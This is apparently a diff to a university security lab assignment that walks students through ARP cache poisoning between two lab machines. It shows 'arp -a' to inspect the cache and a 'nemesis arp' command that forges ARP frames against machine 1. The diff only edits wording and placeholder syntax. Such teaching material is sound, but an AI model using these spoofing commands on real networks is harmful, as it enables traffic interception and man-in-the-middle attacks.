joao-borrego/cripto/assignments/assignment2.md

 ifconfig # ... ether 08:00:27:94:55:1f
 ```

 You can check the contents of the arp table with `arp -a #all`.
-Do it on machine 1 for example.
+Try it on machine 1 for example.
 The command `arp` manipulates the system ARP cache, therefore the previous pings were to push the MAC addresses of those IPs to the cache.

 Now, use `nemesis` in machine 2 to attack the arp table of machine 1.
 ```
-sudo nemesis arp -v -S 192.168.1.3 -D 192.168.1.1 -h [MAC machine 2] -m [MAC machine 1]
+sudo nemesis arp -v -S 192.168.1.3 -D 192.168.1.1 -h <MAC machine 2> -m <MAC machine 1>
 ```
 -h Specifies the sender-hardware-address within the ARP frame only.